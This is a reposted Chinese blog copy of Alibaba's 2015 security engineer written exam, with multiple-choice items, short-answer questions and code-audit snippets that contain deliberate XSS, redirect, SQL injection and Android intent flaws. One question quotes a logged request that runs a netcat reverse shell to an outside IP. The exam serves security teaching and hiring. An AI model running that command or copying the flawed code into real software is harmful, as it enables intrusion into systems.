阿里2015安全工程師筆試題

原文地址:http://bhhacker.lofter.com/post/38b021_68dce48

不定項(xiàng)選擇(多選坠敷、少選递览、錯(cuò)選不得分)

2014年阿里巴巴獎(jiǎng)勵(lì)白帽子數(shù)是多少人捣染?
? 100-200
? 200-300
? 300-400
? 400-500

管理員A君需要限制行政部B君上網(wǎng)需要在哪里配置策略
? 辦公網(wǎng)大樓核心交換機(jī)上設(shè)置安全策略
? 辦公網(wǎng)大樓出口防火墻上設(shè)置安全策略
? 辦公網(wǎng)大樓出口IPS上設(shè)置安全策略
? 辦公網(wǎng)大樓出口路由器設(shè)置安全策略

對(duì)URL中的參數(shù)進(jìn)行簽名的目的是保障數(shù)據(jù)的()
? 可用性
? 保密性
? 完整性

在電影《社交網(wǎng)絡(luò)》中牵咙,主角獲取到了全校所有女生的證件照买鸽,可能是實(shí)施了以下哪種類型的攻擊
? XSS
? CSRF
? 越權(quán)
? 以上選項(xiàng)都不可以

黑客在只能提交文字的博客上描沟,通過發(fā)帖傳播javascript編寫的蠕蟲。這個(gè)博客很可能存在那種漏洞
? URL跳轉(zhuǎn)漏洞
? CSRF
? XSS
? 其他選項(xiàng)都不對(duì)

小A想限制10.243.42.123對(duì)自己服務(wù)器10.243.43.122的web應(yīng)用的钾虐,以下哪些措施是無效的
? 設(shè)置iptables
? 接入交換機(jī)設(shè)備上設(shè)置ACL
? 設(shè)置公網(wǎng)出口防火墻
? 設(shè)置Apache限制

網(wǎng)站開發(fā)框架(SSH)中噪窘,未曾出現(xiàn)過遠(yuǎn)程代碼執(zhí)行漏洞的是
? 第一個(gè)S
? 第二個(gè)S
? H
? 以上都不對(duì)

在能夠獲取root權(quán)限的Android4.3原生系統(tǒng)上,如何打開系統(tǒng)的core dump功能:
? 無需操作效扫,默認(rèn)打開
? 使用命令ulimit –C unlimited打開
? 修改/etc/initrd中的ulimit相關(guān)選項(xiàng)打開
? 修改/etc/initrd中的ulimit相關(guān)選項(xiàng)并重啟系統(tǒng)
? 以上都不對(duì)

以下對(duì)于Masterkey漏洞及其變種的描述倔监,錯(cuò)誤的是:
? 這個(gè)漏洞源自于ZIP文件格式的缺陷
? 這個(gè)漏洞可以用于對(duì)HTTPS進(jìn)行中間人攻擊
? 這個(gè)漏洞可以用于偽造Android系統(tǒng)級(jí)應(yīng)用程序的更新
? 這個(gè)漏洞位于Android上證書文件解析的過程中

ARM(32位)的inline hook, 想要實(shí)現(xiàn)任意位置的跳轉(zhuǎn),至少要修改被HOOK函數(shù)的函數(shù)頭多少個(gè)字節(jié)?
? 1字節(jié)
? 2字節(jié)
? 3字節(jié)
? 4字節(jié)
? 8字節(jié)
? 12字節(jié)
? 16字節(jié)
? 32字節(jié)

簡(jiǎn)答題:

  • 請(qǐng)列舉防御CC攻擊的方法審計(jì)這條web請(qǐng)求荡短,說說你的看法http://www.hack.cn/hack.php?cmd=nc%2058.96.180.251%208080%20-e%20/bin/bash 200

  • 你發(fā)現(xiàn)110.2.3.4正在暴力破解你所管理的服務(wù)器丐枉,你應(yīng)該如何處理?

  • 硬件斷點(diǎn)和軟件點(diǎn)有什么不同掘托?

  • 從網(wǎng)絡(luò)流量上監(jiān)測(cè)到一臺(tái)Linux機(jī)器連接著一臺(tái)木馬控制端,在這臺(tái)機(jī)器上僅使用系統(tǒng)自帶的命令籍嘹,如何定位出哪個(gè)是進(jìn)程連接的闪盔?

  • 如果你設(shè)計(jì)一個(gè)賬號(hào)系統(tǒng),為保障密碼的安全辱士,你會(huì)如何設(shè)計(jì)存儲(chǔ)密碼泪掀?

  • 非對(duì)稱的加密算法可以用來加密,也可以用于簽名颂碘,請(qǐng)說明什么場(chǎng)景下用來加密异赫,什么情景下用來簽名?

  • ContentProvider是Android上負(fù)責(zé)提供數(shù)據(jù)讀寫的組件头岔,應(yīng)用內(nèi)部或者應(yīng)用之間的數(shù)據(jù)共享與存儲(chǔ)都會(huì)使用 ContentProvider組件塔拳。 但在實(shí)際使用過程中,很容易出現(xiàn)各種安全問題峡竣,請(qǐng)結(jié)合你實(shí)踐靠抑,描述一下在使用ContentProvider時(shí),所需要注意的事項(xiàng)适掰。

  • 現(xiàn)有一套針對(duì)某個(gè)jpg文件庫的fuzz環(huán)境颂碧,每秒鐘可以執(zhí)行上千次fuzz實(shí)例荠列,產(chǎn)生的crash很多,每次crash都有對(duì)應(yīng)的crash dump载城,請(qǐng)說如初步何篩選出有價(jià)值的crash肌似,如何確定某個(gè)特定的crash對(duì)應(yīng)的fuzz實(shí)例,以及如何確定一個(gè)crash是否是安全漏洞(假設(shè)我 們只關(guān)心緩沖區(qū)溢出漏洞)诉瓦。

  • gcc編譯器支持的attribute ((constructor))特性得以實(shí)現(xiàn)的底層機(jī)制跟ELF結(jié)構(gòu)的哪個(gè)部分有關(guān)系川队?這個(gè)部分在現(xiàn)實(shí)中哪些地方可以用到?

代碼審計(jì):

  • 淘寶首頁以下代碼片段是否可能存在安全漏洞垦搬?如果有呼寸,請(qǐng)指出來并提供修復(fù)建議;如果沒有猴贰,說明你判斷的理由
#set($url = $!request.getParameter('url'))
<script type="text/javascript">     
    window.location = $url;
</script>
  • 以下程序是否存在安全漏洞对雪?如果有,請(qǐng)指出來并提供修復(fù)建議
<tr>   
    <td class="font_content" align="right">交易狀態(tài):</td>  
    <td class="font_content" align="left"><?php echo $_GET['trade_status'];?></td>
</tr>
  • 以下程序是否存在安全漏洞米绕?如果有瑟捣,請(qǐng)指出來并提供修復(fù)建議。
<?php    
    $id=$_GET['id'];    
    $getacct = mysql_query("select * from orders where id='$id' and client id='$fnm->clientid") or dir(mysql_error());    
    while ($row = mysql_fetch_array($getacct))    {    
        acctid = $row["id"];
?>    
<tr><td>Cpanel User:</td><td><?=$acctid;?></td></tr>
<?php    
}
?>
  • 在Linux系統(tǒng)中栅干,我們通常使用終端shell腳本處理一些數(shù)據(jù)迈套,十分高效便捷。現(xiàn)在有以下兩個(gè)文件:
    File1:
user passwd
Hoecker animal
Newbee 238H76N3
Buttes Paradis1
TRON995 fdcmdgeo
G60FgL LgEl9H
ozron44 oriole62

File2:

id user
001 Yosh405
002 Newbee
003 G60FgL
004 Hoecker
005 sudhakar0303

要求:編寫一段shell腳本碱鳞,輸出同時(shí)存在于File1和File2中用戶名的密碼桑李。(可使用管道命令,只輸出密碼)

  • 以下是一段導(dǎo)出Activity的onCreate和onNewIntent函數(shù)中的代碼窿给,請(qǐng)找出其中的所有漏洞并說明可能產(chǎn)生的危害:其中:alibaba.test.sender是同樣由淘寶開發(fā)的另一個(gè)應(yīng)用程序的package name贵白。此Activity對(duì)應(yīng)的manifest文件中的定義:
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);        
    String calling_package= getCallingPackage();        
    if (!calling_package.equals("alibaba.test.sender")) {            
        return;        
    }  
}
protected void onNewIntent (Intent intent) {
    super.onNewIntent(intent);        
    Intent intent = getIntent();        
    Intent rec_intent;       
    rec_intent=intent.getParcelableExtra("log_intent");        
    Date date = new Date();      
    rec_intent.putExtra("timestamp",date.getTime());    
    rec_intent.putExtra("EVENT_TYPE","activity_launched");        
    rec_intent.setAction("LOG_ACTION");
   sendBroadcast(rec_intent, "TAOBAO_BROADCAST_RECEIVER");           
}
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市崩泡,隨后出現(xiàn)的幾起案子禁荒,更是在濱河造成了極大的恐慌,老刑警劉巖角撞,帶你破解...
    沈念sama閱讀 206,482評(píng)論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件呛伴,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡谒所,警方通過查閱死者的電腦和手機(jī)热康,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,377評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來百炬,“玉大人褐隆,你說我怎么就攤上這事∑视唬” “怎么了庶弃?”我有些...
    開封第一講書人閱讀 152,762評(píng)論 0 342
  • 文/不壞的土叔 我叫張陵衫贬,是天一觀的道長。 經(jīng)常有香客問我歇攻,道長固惯,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,273評(píng)論 1 279
  • 正文 為了忘掉前任缴守,我火速辦了婚禮葬毫,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘屡穗。我一直安慰自己贴捡,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,289評(píng)論 5 373
  • 文/花漫 我一把揭開白布村砂。 她就那樣靜靜地躺著烂斋,像睡著了一般。 火紅的嫁衣襯著肌膚如雪础废。 梳的紋絲不亂的頭發(fā)上汛骂,一...
    開封第一講書人閱讀 49,046評(píng)論 1 285
  • 那天,我揣著相機(jī)與錄音评腺,去河邊找鬼帘瞭。 笑死,一個(gè)胖子當(dāng)著我的面吹牛蒿讥,可吹牛的內(nèi)容都是我干的蝶念。 我是一名探鬼主播,決...
    沈念sama閱讀 38,351評(píng)論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼芋绸,長吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼祸轮!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起侥钳,我...
    開封第一講書人閱讀 36,988評(píng)論 0 259
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎柄错,沒想到半個(gè)月后舷夺,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,476評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡售貌,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,948評(píng)論 2 324
  • 正文 我和宋清朗相戀三年给猾,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片颂跨。...
    茶點(diǎn)故事閱讀 38,064評(píng)論 1 333
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡敢伸,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出恒削,到底是詐尸還是另有隱情池颈,我是刑警寧澤尾序,帶...
    沈念sama閱讀 33,712評(píng)論 4 323
  • 正文 年R本政府宣布,位于F島的核電站躯砰,受9級(jí)特大地震影響每币,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜琢歇,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,261評(píng)論 3 307
  • 文/蒙蒙 一兰怠、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧李茫,春花似錦揭保、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,264評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至娜庇,卻和暖如春塔次,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背名秀。 一陣腳步聲響...
    開封第一講書人閱讀 31,486評(píng)論 1 262
  • 我被黑心中介騙來泰國打工励负, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人匕得。 一個(gè)月前我還...
    沈念sama閱讀 45,511評(píng)論 2 354
  • 正文 我出身青樓继榆,卻偏偏與公主長得像,于是被迫代替她去往敵國和親汁掠。 傳聞我的和親對(duì)象是個(gè)殘疾皇子略吨,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,802評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容

  • Android 自定義View的各種姿勢(shì)1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 171,510評(píng)論 25 707
  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn)考阱,斷路器翠忠,智...
    卡卡羅2017閱讀 134,599評(píng)論 18 139
  • ¥開啟¥ 【iAPP實(shí)現(xiàn)進(jìn)入界面執(zhí)行逐一顯】 〖2017-08-25 15:22:14〗 《//首先開一個(gè)線程,因...
    小菜c閱讀 6,358評(píng)論 0 17
  • 好種子: 1今天從姐姐家出來乞榨,姐姐給了我一個(gè)大紅包秽之,哇塞,收到驚喜吃既,看到里面的錢更驚喜考榨!好開心呀,錢包里一下又有人...
    西紅柿的小姑娘閱讀 218評(píng)論 0 0
  • 書沒讀多少鹦倚,卻越發(fā)的讀出了很多不同的味道河质。我的思想里常常充斥著病態(tài)的想法,我一直希望自己即使是饑寒交迫的時(shí)候,也要...
    逆風(fēng)仰望閱讀 237評(píng)論 3 6